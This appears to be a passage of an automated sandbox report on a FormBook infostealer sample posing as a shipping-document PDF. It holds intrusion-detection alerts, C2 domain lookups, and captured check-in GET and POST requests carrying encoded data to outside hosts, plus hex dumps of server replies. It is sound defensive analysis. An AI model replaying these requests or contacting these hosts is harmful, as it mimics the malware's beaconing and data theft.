            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50022 -> 91.212.26.5:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 154.23.184.194:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 107.148.177.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49938 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 154.23.184.194:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 68.66.226.116:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49983 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 63.250.47.57:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50018 -> 107.148.177.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50034 -> 63.250.47.57:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50054 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 3.33.130.190:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.academyinmotion.xyz
            Source: DNS query: www.030002252.xyz
            Source: DNS query: www.60881.xyz
            Source: DNS query: www.ly0.xyz
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Joe Sandbox ViewIP Address: 65.21.196.90 65.21.196.90
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: CP-ASDE CP-ASDE
            Source: Joe Sandbox ViewASN Name: WEBINDUSTRIEFR WEBINDUSTRIEFR
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
            Source: global trafficHTTP traffic detected: GET /63ck/?Znyl=2rnxDB&Qzj=GQYraOg50FzHvWxTy9J2g/Ct8yJZYLUl1pszYO6BquwY8zCRfPuOPPLv6opwWQ+1qa0YVJN1ZlZd4AL6pjVc8tqy3KaAjtZyQfx4UTLqHu607EYV+xyRwE8= HTTP/1.1Host: www.academyinmotion.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /o7wc/?Qzj=noDrsAMitbMGukbGKwTOr3sYcBr23H5ivpvnAiMvw1nUlPzFIxH7oxZbrZBuy0eo4pgag2ycYt5GuEsaJdfqIMS3tV1Dx9iQIhSiX0wNT38Z12lUBSmDrQk=&Znyl=2rnxDB HTTP/1.1Host: www.heeraka.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /53bw/?Znyl=2rnxDB&Qzj=y602DfOxy8k4aDGeL32BfjMr8rtJj4VEvf5zKPNxBw/5ZQtnSgrsDIShG/LT94BV3SRTeLh29bGmgRGfpvfkbNV5yHp9DO9ljl/7OAHX9kTVnWn3IiM7pPI= HTTP/1.1Host: www.awesomearv.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /2ncs/?Qzj=C9x4nV75ALRtqPK+aAR0NWmp5g6EqVqabxnIo4b2Z27N+E0QPuJF7pA8iv4PlagxECtfepEWwKhTDmrEQ68cs056FDzHHej7JHydzS2yCPPgbwEKPk9K7sk=&Znyl=2rnxDB HTTP/1.1Host: www.030002252.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ynjl/?Qzj=PEs7u0VzI3DSA9TKYNWnz6gyWb/C39oE0a50vjpoFb3NQEkD5EPR31gJ3YEDEVY88OmbAto+098c/gTiopGLABAEMyjtpbfsUvV6UeXcuCjdlGHHhk6aRcY=&Znyl=2rnxDB HTTP/1.1Host: www.60881.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /r61b/?Qzj=3quBh4mzL0lL+B9uaAFlB72ZycJbxnt6GENoLoKygJVSWFdT0X7NdoQT/6uiE3Ni1BD7Zx2rh99upTwYdPvuDtoYAZVOuycnaW3rI/gIwuhnX/+XN/+iqEA=&Znyl=2rnxDB HTTP/1.1Host: www.mjcregionsud.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /kbee/?Qzj=DCgTIaYcg8rLkvez6aURNH1rI8GLniCnkbIF1Zor3lwvkrlOJ/rxEwh4juCbWbA1v3jo2CjSkAc6+9U16ObyIJEVbwGNWxBZ4iE6d4sVGLDCvtPxuAtI0Gg=&Znyl=2rnxDB HTTP/1.1Host: www.levelsabovetravel.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /9m01/?Qzj=YTEnPXeuvLCqp8pRYoqPCdBwzXmtEoIu3aiFszfHZiHCethv0UoX0rXDgO0m0L5Zay3qgh7+EeCD2cfEa0kxYtbLgo4/0RqeWSM2Ph2v0Riv4xOBN3dU33Q=&Znyl=2rnxDB HTTP/1.1Host: www.d81dp.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /q7ah/?Qzj=yQb1MnoYePGa+D7HYWwXgG+nDQu6P4qgSNNB5eb+vdtsin1jnkdmikqCDVoWxFHrVuMckJ02SL88S12T7EptmvXNk3VDSDUHyMzwNFIiRJYEDhiEAb6niHg=&Znyl=2rnxDB HTTP/1.1Host: www.numbox.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /vshw/?Qzj=EspU2mytRZKz4auAzVKL1tfZdJmh9evbelDltaue1VIW4sYIVCILyk3Sg5ScN2hRjv7eCPLeVYxJkFe87LUrFuvYQ7vdzmgwzIu85Xz/vDtptw9jh7A1S+4=&Znyl=2rnxDB HTTP/1.1Host: www.ly0.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /kgyd/?Znyl=2rnxDB&Qzj=Wu3HLPqvQhberYZQa2vA+jLd86RSCoLcCB7xsP8R/99k0A4wkukwLWUZ+Z7OJCWhofveZifw88127MBJWT7MfBvd7RqI/EwbWL2cnrCtj+ZcWXeu3tlvVIc= HTTP/1.1Host: www.myrideguy.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /qwed/?Qzj=3xPBQa2W6ZGmKQ9eZ4Wsc/iyYd0uukSyxcTE+lTJMU/LzzcDJGN7AbwmZfmE7bRgUl3cSaaIlgRs7XOqQeV161XTOJOG3ZFD8XPlmSsUpfcf+2m+08EeHO0=&Znyl=2rnxDB HTTP/1.1Host: www.lunch.deliveryAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /te6q/?Qzj=Bi48EnnHLnucFoFteZ9CbIdOGuitqrUowmdcea1K+IX7Dd8zgRCPoEq+V26bo8zYK23oBEB5tVQZMZR237sZHxvwddrlAP0HIvOhneqwjksiJ5dMJ78gJU0=&Znyl=2rnxDB HTTP/1.1Host: www.allinathletes.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /el3s/?Qzj=6Ta3dC1SbFexLGaAyK/XrrF8DJnhB8YLWm/0OzXEbXNGBqYW7sBnSGIWAqT2FNWebLiZ+YaCaloaRZMkiWHL3ouL7ZTQk1OjsJsHDhDi+W4oi2FDqh4Gk0M=&Znyl=2rnxDB HTTP/1.1Host: www.barbequecritics.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficDNS traffic detected: DNS query: www.academyinmotion.xyz
            Source: global trafficDNS traffic detected: DNS query: www.heeraka.info
            Source: global trafficDNS traffic detected: DNS query: www.awesomearv.buzz
            Source: global trafficDNS traffic detected: DNS query: www.030002252.xyz
            Source: global trafficDNS traffic detected: DNS query: www.60881.xyz
            Source: global trafficDNS traffic detected: DNS query: www.mjcregionsud.org
            Source: global trafficDNS traffic detected: DNS query: www.levelsabovetravel.info
            Source: global trafficDNS traffic detected: DNS query: www.d81dp.top
            Source: global trafficDNS traffic detected: DNS query: www.numbox.live
            Source: global trafficDNS traffic detected: DNS query: www.ly0.xyz
            Source: global trafficDNS traffic detected: DNS query: www.myrideguy.net
            Source: global trafficDNS traffic detected: DNS query: www.lunch.delivery
            Source: global trafficDNS traffic detected: DNS query: www.allinathletes.biz
            Source: global trafficDNS traffic detected: DNS query: www.barbequecritics.com
            Source: unknownHTTP traffic detected: POST /o7wc/ HTTP/1.1Host: www.heeraka.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateOrigin: http://www.heeraka.infoConnection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.heeraka.info/o7wc/User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4Data Raw: 51 7a 6a 3d 71 71 72 4c 76 30 35 53 38 74 70 52 73 6d 58 31 5a 6b 62 52 30 6a 45 79 5a 43 72 38 34 31 31 6f 71 70 36 32 57 43 51 73 2f 45 7a 74 69 71 2f 34 66 30 53 64 75 69 64 33 39 70 59 46 35 31 66 56 31 71 6b 56 6f 6e 71 75 57 49 35 72 6d 45 63 48 42 2f 4c 6f 63 49 7a 6a 68 32 31 4b 6c 74 75 78 54 45 37 50 44 6b 55 67 55 78 52 75 78 31 78 6b 4e 53 50 53 33 44 43 49 69 72 7a 52 4e 32 4d 33 73 73 54 47 6e 5a 6f 79 6c 4a 66 37 58 64 65 4f 79 35 2f 50 68 6a 43 35 31 66 2f 43 56 59 36 72 2f 65 6c 51 44 36 52 64 44 65 38 58 52 34 45 34 79 48 56 39 37 69 61 4f 50 78 4c 6c 79 51 6a 32 55 77 3d 3d Data Ascii: Qzj=qqrLv05S8tpRsmX1ZkbR0jEyZCr8411oqp62WCQs/Eztiq/4f0Sduid39pYF51fV1qkVonquWI5rmEcHB/LocIzjh21KltuxTE7PDkUgUxRux1xkNSPS3DCIirzRN2M3ssTGnZoylJf7XdeOy5/PhjC51f/CVY6r/elQD6RdDe8XR4E4yHV97iaOPxLlyQj2Uw==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 03:07:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 03:07:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 03:07:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 